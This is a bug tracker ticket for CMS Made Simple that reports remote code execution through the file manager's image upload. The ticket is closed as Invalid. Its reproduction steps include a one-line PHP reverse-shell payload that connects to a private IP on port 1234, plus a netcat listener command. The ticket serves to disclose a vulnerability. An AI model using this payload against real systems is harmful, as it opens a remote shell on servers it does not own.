CMS MADE SIMPLE FORGE

CMS Made Simple Core

 

[#12155] Remote code execution via file upload functionality

avatar
Created By: Neelima Bawa (Neelima)
Date Submitted: Sat Sep 21 04:32:01 -0400 2019

Assigned To:
Version: 2.3-beta7
CMSMS Version: 2.3-beta7
Severity: Critical
Resolution: Invalid
State: Closed
Summary:
Remote code execution via file upload functionality
Detailed Description:
1) login as an legitimate user 
2) go to the content tab > file manager > upload images
3) write a shell script in php 
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.225.52/1234 0>&1'");
4) upload the shell file (php format) in upload images
5) At this point a Netcat Listener was running on my Server
nc -l 1234
6) shell will executed when click on uploaded php file
7) After these steps, my Server (IP: 192.168.225.52) received the Reverse Shell
successfully


History

Updates

Updated: 2020-11-03 14:38
state: Open => Closed

Updated: 2019-09-21 09:49
resolution_id: 5 => 9

Updated: 2019-09-21 04:54
version_id: 31633 => 31637
resolution_id: => 5
cmsms_version_id: 31633 => 31637